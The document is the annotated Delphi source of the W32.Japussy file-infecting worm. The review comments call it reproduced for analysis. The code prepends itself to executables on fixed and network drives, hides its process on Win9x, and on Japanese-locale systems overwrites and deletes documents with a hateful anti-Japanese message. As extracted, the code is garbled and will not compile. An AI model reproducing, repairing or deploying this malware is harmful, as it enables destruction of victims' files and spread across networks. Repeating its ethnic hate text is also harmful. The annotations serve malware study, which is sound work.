Program japussy;
Uses
Windows, sysutils, classes, graphics, shellapi {, registry };
Const
// NOTE(review): this listing is the published source of the W32.Japussy worm, reproduced here
// for analysis only. As extracted the text is garbled (`: =` for `:=`, spaces inside identifiers,
// stray spaces in string literals) and will not compile as-is; do not treat the exact literal
// values as reliable indicators without comparing them against an original sample.
//
// The numbers below describe the layout of the worm's OWN PE image. They depend on the exact
// compiler build that produced it (see the author's note), so other builds carry different values.
Headersize = 82432; // byte length of the worm image that is prepended to every host; extractfile skips this many bytes and infectonefile writes the host at this offset
Iconoffset = $12eb8; // file offset of the worm's primary icon bitmap inside its own image; infectonefile overwrites this region with the host's icon so the infected file keeps the host's look
// The size obtained by compiling on my delphi5 SP1. The Delphi of other versions may be different.
// Search for the hexadecimal string of 2800000020 to find the offset of the primary graph.
{
Headersize = 38912; // the size of the virus body compressed by UPX
Iconoffset = $ 92bc; // the offset of the UPX compressed over the main graph of the PE File
// UPX 1.24 W usage: UPX-9 -- 8086 japussy.exe
}
Iconsize = $2e8; // 744 bytes: length of the icon bitmap copied from the host (read from offset 22 of the icon stream in infectonefile)
Icontail = iconoffset + iconsize; // first byte after the icon bitmap; the tail of the worm image [Icontail, Headersize) is copied through unchanged
Id = $44444444; // infection marker: the 4 bytes "DDDD" appended to the end of every infected file; infectonefile reads the last 4 bytes of a candidate and skips it when they equal this value
// Junk string that smashfile writes into a victim file at several offsets before deleting it.
Catchword = 'If a race need to be killed out, it must be Yamato. '+
'If a country need to be destroyed, it must be Japan! '+
'*** W32.japussy. worm. ***';
{$ R *. Res}
// Undocumented Win9x kernel32 export. The main program calls it with dwtype = 1 only when
// iswin9x reports Win9x. It is commonly used to hide a process from the Win9x task list, but
// that effect is not demonstrated anywhere in this listing. The DLL name as extracted
// contains stray spaces.
Function registerserviceprocess (dwprocessid, dwtype: integer): integer;
Stdcall; External 'kernel32. dll '; // function declaration
VaR
Tmpfile: string; // path under which the main program writes the extracted host executable
Si: startupinfo; // filled by fillstartupinfo and passed to CreateProcess in the main program
Pi: process_information; // receives the handles/IDs of the launched host process (never closed in this listing)
Isjap: Boolean = false; // set by infectfiles when GetACP() = 932 (Japanese ANSI code page); loopfiles only calls smashfile when this is true
{Determine whether the running OS is Win9x}
// Returns True when GetVersionEx reports VER_PLATFORM_WIN32_WINDOWS (the Win95/98/ME line).
// Returns False on the NT line and also when GetVersionEx itself fails, so a failed call is
// silently treated as "not Win9x" (the main program then takes the NT branch).
Function iswin9x: Boolean;
VaR
Ver: tosversioninfo;
Begin
Result: = false;
Ver. dwosversioninfosize: = sizeof (tosversioninfo ); // the API requires the size field to be set before the call
If not getversionex (VER) then
Exit; // call failed: fall through with Result = false
If (ver. dwplatformid = ver_platform_win32_windows) Then // Win9x
Result: = true;
End;
{Copy a byte range from one stream to another without disturbing either stream's position}
// Copies `count` bytes starting at absolute offset `sstartpos` of SRC into DST starting at
// absolute offset `dstartpos`. The current positions of both streams are saved first and
// restored afterwards, so callers can chain several copies without tracking positions.
// The Seek origin 0 is soFromBeginning, i.e. both offsets are absolute.
// No check is made that SRC actually holds `count` bytes past sstartpos; presumably
// TStream.CopyFrom raises on a short read (see the note on the finally block in infectonefile).
Procedure copystream (SRC: tstream; sstartpos: integer; DST: tstream;
Dstartpos: integer; count: integer );
VaR
Scurpos, dcurpos: integer;
Begin
Scurpos: = SRC. position; // remember both positions so the copy is side-effect free
Dcurpos: = DST. position;
SRC. Seek (sstartpos, 0 );
DST. Seek (dstartpos, 0 );
DST. copyfrom (SRC, count );
SRC. Seek (scurpos, 0 ); // restore
DST. Seek (dcurpos, 0 );
End;
{Split the original host program out of the running infected file so it can be executed}
// Writes everything after the first Headersize bytes of the running executable (paramstr(0))
// to `filename`. In an infected file that region is the original host program as appended by
// infectonefile, followed by the 4-byte infection marker that infectonefile adds after the host;
// nothing here strips that marker, so the extracted host still ends with "DDDD". Any exception
// (file locked, disk full, unwritable path) is swallowed by the outer try/except, so the caller
// cannot tell whether the file was actually produced.
Procedure extractfile (filename: string );
VaR
Sstream, dstream: tfilestream;
Begin
Try
// open own image for shared read (it is executing, so exclusive access is not available)
Sstream: = tfilestream. Create (paramstr (0), fmopenread or fmsharedenynone );
Try
Dstream: = tfilestream. Create (filename, fmcreate ); // truncates/creates the target
Try
Sstream. Seek (headersize, 0); // skip the virus section of the header
Dstream. copyfrom (sstream, sstream. Size-headersize ); // host bytes + trailing 4-byte marker
Finally
Dstream. Free;
End;
Finally
Sstream. Free;
End;
Except
// deliberately silent: failures are hidden from the caller
End;
End;
{Fill startupinfo structure}
// Fills the STARTUPINFO fields needed to launch the extracted host with CreateProcess.
// Only the listed members are assigned; the remaining members (dwX/dwY, standard handles, ...)
// are left as they were in the caller's record. `State` becomes wShowWindow and is honoured
// because dwFlags is set to STARTF_USESHOWWINDOW.
Procedure fillstartupinfo (VAR Si: startupinfo; State: Word );
Begin
Si. CB: = sizeof (SI ); // required by the API
Si. lpreserved: = nil;
Si. lpdesktop: = nil; // default desktop
Si. lptitle: = nil;
Si. dwflags: = startf_useshowwindow; // makes wShowWindow effective
Si. wshowwindow: = State;
Si. cbreserved2: = 0;
Si. lpreserved2: = nil;
End;
{Mail the worm to harvested addresses (unimplemented stub)}
// Empty stub: infectfiles calls this once per sweep but, as published, no mail is sent.
// No address harvesting or SMTP code exists anywhere in this listing.
Procedure Sendmail;
Begin
// Who is willing to do this?
End;
{Infect one PE file: prepend the worm image, keep the host's icon, append the marker}
// Prepends the worm to a single executable. Resulting file layout (see the constants):
//   [0, Iconoffset)            worm image (read from paramstr(0))
//   [Iconoffset, Icontail)     the host's own primary icon bitmap, so the infected file keeps its icon
//   [Icontail, Headersize)     rest of the worm image
//   [Headersize, +host size)   the unmodified host
//   last 4 bytes               infection marker Id ("DDDD")
// Candidates are skipped when: the name compares equal to the worm's own name, no "PE" byte
// pair is found in the first $109 offsets, the last 4 bytes already equal Id, or the file is
// smaller than 10240 bytes. Every exception is swallowed by the outer try/except, so a locked
// or read-only file is silently left alone — but see the note on the final finally block.
Procedure infectonefile (filename: string );
VaR
Hdrstream, srcstream: tfilestream;
Icostream, dststream: tmemorystream;
IID: longint;
Aicon: ticon;
Infected, ISPE: Boolean;
I: integer;
Buf: array [0 .. 1] of char;
Begin
Try // if an error occurs, the file is in use and exits.
// Self-exclusion. loopfiles passes a full path (path + name), so a bare-name comparison only
// matches when the path prefix is empty; this check is weaker than the comment suggests.
If comparetext (filename, 'japussy.exe ') = 0 then // if you are yourself, do not infect
Exit;
Infected: = false;
ISPE: = false;
Srcstream: = tfilestream. Create (filename, fmopenread );
Try
// Crude PE test: look for the bytes 'P','E' (#80 #69) at any offset 0..$108. e_lfanew is not
// consulted, so any "PE" pair in the first 266 bytes passes and a header placed further in is missed.
For I: = 0 to $108 Do // check the PE File Header
Begin
Srcstream. Seek (I, sofrombeginning );
Srcstream. Read (BUF, 2 );
If (BUF [0] = #80) and (BUF [1] = #69) Then // PE tag
Begin
ISPE: = true; // It is a PE file.
Break;
End;
End;
// Already-infected test: the last 4 bytes of an infected file equal Id.
Srcstream. Seek (-4, sofromend); // check the infection mark
Srcstream. Read (IID, 4 );
If (IID = ID) or (srcstream. Size <10240) Then // files that are too small are not infected
Infected: = true;
Finally
Srcstream. Free; // NOTE: the variable still holds the freed reference after this point
End;
If infected or (not ISPE) Then // exit if the file is infected or not a PE File
Exit;
Icostream: = tmemorystream. Create;
Dststream: = tmemorystream. Create;
Try
Aicon: = ticon. Create;
Try
// Obtain the master icon of the infected file (744 bytes) and store it to the stream.
// ExtractIcon returns the host's first icon; the result handle is not checked for 0 (no icon).
Aicon. releasehandle;
Aicon. Handle: = extracticon (hinstance, pchar (filename), 0 );
Aicon. savetostream (icostream ); // writes an .ico-format image into icostream
Finally
Aicon. Free;
End;
Srcstream: = tfilestream. Create (filename, fmopenread );
// Header file
Hdrstream: = tfilestream. Create (paramstr (0), fmopenread or fmsharedenynone );
Try
// Write data before the main icon of the virus.
Copystream (hdrstream, 0, dststream, 0, iconoffset );
// Write the main icon of the current program
// Offset 22 skips the .ico file header — presumably the 6-byte ICONDIR plus one 16-byte ICONDIRENTRY.
Copystream (icostream, 22, dststream, iconoffset, iconsize );
// Write data between the main icon of the virus and the end of the virus.
Copystream (hdrstream, icontail, dststream, icontail, headersize-icontail );
// Write the Host Program
Copystream (srcstream, 0, dststream, headersize, srcstream. size );
// Write the infected mark
Dststream. Seek (0, 2 ); // origin 2 = soFromEnd
IID: = $44444444;
Dststream. Write (IID, 4 );
Finally
Hdrstream. Free;
End;
Finally
// NOTE(review): this finally runs on the exception path too. If anything between the
// icon extraction and the marker write raises, the host is still overwritten below with
// whatever dststream holds at that moment (empty or partial) and the exception is then
// swallowed — an infection attempt can therefore truncate the victim. Also, if the failure
// happens before srcstream is re-created above, the Free below acts on the stale reference
// left by the first Free.
Srcstream. Free;
Icostream. Free;
Dststream. savetofile (filename); // Replace the host file
Dststream. Free;
End;
Except;
End;
End;
{Overwrite the target file with the junk string at several evenly spaced offsets, then delete it}
// Destructive payload, reached from loopfiles only when Isjap is true. Clears the file's
// attributes (so read-only does not protect it), writes the Catchword string at `Max`
// evenly spaced offsets — `Max` is random in 5..14 — and then deletes the file. Exceptions are
// swallowed. Forensic note: a file that was overwritten but not deleted (e.g. DeleteFile
// failed) will contain the Catchword text at offsets that are multiples of size div Max.
Procedure smashfile (filename: string );
VaR
Filehandle: integer;
I, size, mass, Max, Len: integer;
Begin
Try
Setfileattributes (pchar (filename), 0); // remove the read-only attribute
Filehandle: = fileopen (filename, fmopenwrite); // open the file
Try
Size: = getfilesize (filehandle, nil); // File Size
I: = 0;
Randomize;
MAX: = random (15); // 0..14 passes
If max <5 then
MAX: = 5; // floor at 5, so 5..14 writes in total
Mass: = size Div Max; // distance between write positions
Len: = length (catchword );
While I <Max do
Begin
FileSeek (filehandle, I * mass, 0); // position I-th write
// Write the spam code to completely destroy the file
Filewrite (filehandle, catchword, Len );
INC (I );
End;
Finally
Fileclose (filehandle); // close the file
End;
Deletefile (pchar (filename); // delete it
Except
// silent
End;
End;
{Return the letters of all fixed and network drives}
// Probes drive letters A..Z with GetDriveType and returns the letters (no colon) of those
// reported as DRIVE_FIXED or DRIVE_REMOTE; removable media and CD-ROMs are not included.
// Network shares are therefore in scope for infection and for smashfile.
// Result is never explicitly initialised before being appended to — presumably relies on the
// caller's result temporary being empty (confirm; Delphi does not guarantee this for all call sites).
// The root path as extracted uses a forward slash ('X:/'); Windows accepts it, but the original
// sample may have used a backslash.
Function getdrives: string;
VaR
Disktype: word;
D: Char;
STR: string;
I: integer;
Begin
For I: = 0 to 25 do // print 26 letters
Begin
D: = CHR (I + 65 ); // 65 = 'A'
STR: = d + ':/';
Disktype: = getdrivetype (pchar (STR ));
// Obtain the local disk and Network Disk
If (disktype = drive_fixed) or (disktype = drive_remote) then
Result: = Result + D;
End;
End;
{Traverse directories, infect and destroy files}
// Recursive directory walk. First pass over `path + mask`: every entry classed as a plain file
// is dispatched by (upper-cased) extension — executables go to infectonefile, several address
// book / web file types are no-op stubs, and, when Isjap is true, a list of document and media
// types goes to smashfile. The worm sleeps 200 ms after each entry and drains the message
// queue to keep CPU usage low. Second pass collects subdirectories and recurses into each.
// As extracted, the extension literals are lower-case and padded with spaces while Ext is
// upper-cased, and some entries in the Isjap list are clearly garbled ('hangzhou', 'users'),
// so the exact set of targeted extensions cannot be recovered from this page; the recursion
// line also lost its index expression into subdir.Strings. Treat this block as a description
// of intent rather than compilable code.
Procedure loopfiles (path, mask: string );
VaR
I, Count: integer;
FN, ext: string;
Subdir: tstrings;
Searchrec: tsearchrec;
MSG: tmsg;
// Classifies a directory entry (parameter shadows the outer Searchrec):
//   0 = attributes are not exactly 16 (faDirectory) and the name is not '.'/'..' — treated as a file
//   1 = attributes are exactly 16 and the name is not '.'/'..' — a subdirectory to recurse into
//   2 = the '.' or '..' entries (the original comment called this "root directory")
// Because the test is ATTR = 16 (equality, not a bit test), a directory with extra attribute
// bits (hidden, system, read-only) is classed 0 and is never recursed into.
Function isvaliddir (searchrec: tsearchrec): integer;
Begin
If (searchrec. ATTR <> 16) and (searchrec. Name <> '.') and
(Searchrec. Name <> '..') then
Result: = 0 // not a directory
Else if (searchrec. ATTR = 16) and (searchrec. Name <> '.') and
(Searchrec. Name <> '..') then
Result: = 1 // not the root directory
Else result: = 2; // the root directory.
End;
Begin
If (findfirst (path + mask, faanyfile, searchrec) = 0) then
Begin
Repeat
Peekmessage (MSG, 0, 0, 0, pm_remove); // adjust the message queue to avoid suspicion.
If isvaliddir (searchrec) = 0 then
Begin
FN: = path + searchrec. Name; // full path; this is what infectonefile/smashfile receive
Ext: = uppercase (extractfileext (FN ));
If (EXT = '.exe ') or (EXT ='. scr ') then
Begin
Infectonefile (FN); // infect the executable file
End
Else if (EXT = '.htm') or (EXT = '.html ') or (EXT ='. asp ') then
Begin
// Infect HTML and ASP files and write base64-encoded viruses
// Infect all users who browse this page
// Which of the following is willing to do this?
// (stub — nothing is done to these files in this listing)
End
Else if ext = '. wab' then // Outlook Address Book File
Begin
// Obtain the Outlook Email Address
// (stub)
End
Else if ext = '. ADC' Then // the Foxmail address automatically completes the file.
Begin
// Obtain the Foxmail email address
// (stub)
End
Else if ext = 'ind 'then // Foxmail Address Book File
Begin
// Obtain the Foxmail email address
// (stub)
End
Else
Begin
If isjap then // destructive branch: only when GetACP() = 932 (set in infectfiles)
Begin
If (EXT = '.doc ') or (EXT = '.xls') or (EXT = '. mdb') or
(EXT = 'hangzhou') or (EXT = '. M') or (EXT ='. A') or
(EXT = '.wma ') or (EXT = '.zip') or (EXT = '.rar ') or
(EXT = '. MpEG') or (EXT = '. asf') or (EXT = '.jpg') or
(EXT = '.jpeg ') or (EXT = '.gif') or (EXT = '.swf ') or
(EXT = 'users') or (EXT = '. chm') or (EXT ='. avi') then
Smashfile (FN); // destroy the file
End;
End;
End;
// After a file is infected or deleted, it sleeps for 200 milliseconds to avoid suspicion of high CPU usage.
Sleep (200 );
Until (findnext (searchrec) <> 0 );
End;
Findclose (searchrec );
// Second pass: gather subdirectory names, then recurse. The faDirectory mask presumably adds
// directories to the normal files FindFirst always returns, so the "= 1" test does the filtering.
Subdir: = tstringlist. Create;
If (findfirst (path + '*. *', fadirectory, searchrec) = 0) then
Begin
Repeat
If isvaliddir (searchrec) = 1 then
Subdir. Add (searchrec. Name );
Until (findnext (searchrec) <> 0 );
End;
Findclose (searchrec );
Count: = subdir. Count-1;
For I: = 0 to count do
Loopfiles (path + subdir. Strings + '/', mask ); // unbounded recursion depth; index into Strings lost in extraction
Freeandnil (subdir );
End;
{Sweep every fixed and network drive forever, infecting executables (and destroying documents on a Japanese locale)}
// Main worker; never returns. Sets Isjap when the system ANSI code page is 932 (Japanese),
// which arms the smashfile branch in loopfiles. Then loops forever: walk every drive returned
// by getdrives, call the (empty) Sendmail stub, sleep five minutes, repeat.
// The drive list is read once at start-up, so drives mapped later are never visited.
// As extracted, the loop body lost its index into driverlist (`driverlist + ':/'`); the
// intent per the comment is one loopfiles call per drive letter, last letter first.
Procedure infectfiles;
VaR
Driverlist: string;
I, Len: integer;
Begin
If getacp = 932 then // 932 = Japanese Shift-JIS ANSI code page
Isjap: = true; // Let's die!
Driverlist: = getdrives; // obtain the writable disk list.
Len: = length (driverlist );
While true do // Infinite Loop
Begin
For I: = Len downto 1 do // traverse each disk drive
Loopfiles (driverlist + ':/', '*. *'); // infected
Sendmail; // send a mail with a virus
Sleep (1000*60*5); // sleep for 5 minutes
End;
End;
{Main program start}
// Program entry point.
//   Win9x: register the process as a "service process" (return value ignored); otherwise the
//   NT branch is an empty stub, so on NT the worm simply runs in plain sight.
//   If the executable is named japussy.exe it is the original dropper and goes straight to
//   infectfiles. Any other name means "we are a parasite on a host": extract the host to a
//   sibling file, launch it so the user sees the expected program, then run infectfiles.
// Forensic indicator: the extracted host is written next to the infected file with a name
// that contains a space before ".exe". Note that the Delete call below removes four characters
// starting four positions before the end of the path, which does not simply strip ".exe";
// verify the exact naming against a real sample rather than this extraction.
// extractfile swallows its errors, so CreateProcess is attempted even if extraction failed.
// The handles returned in Pi are never closed; infectfiles never returns.
Begin
If iswin9x then // is Win9x
Registerserviceprocess (getcurrentprocessid, 1) // register as a service process
Else // winnt
Begin
// Remote thread ing to explorer process
// Which station is willing to complete?
// (stub — nothing is done on NT)
End;
// If it is the original virus
If comparetext (extractfilename (paramstr (0), 'japussy.exe ') = 0 then
Infectfiles // infect and send emails
Else // has been parasitic on the host Program and started to work
Begin
Tmpfile: = paramstr (0); // create a temporary file
Delete (tmpfile, length (tmpfile)-4, 4 );
Tmpfile: = tmpfile + #32 + '.exe '; // real host file with one more space
Extractfile (tmpfile); // separated
Fillstartupinfo (Si, sw_showdefault );
// inherit handles = True, creation flags = 0, environment = nil, current directory = '.'
CreateProcess (pchar (tmpfile), pchar (tmpfile), nil, nil, true,
0, nil, '.', Si, Pi); // create a new process to run
Infectfiles; // infect and send emails
End;
End.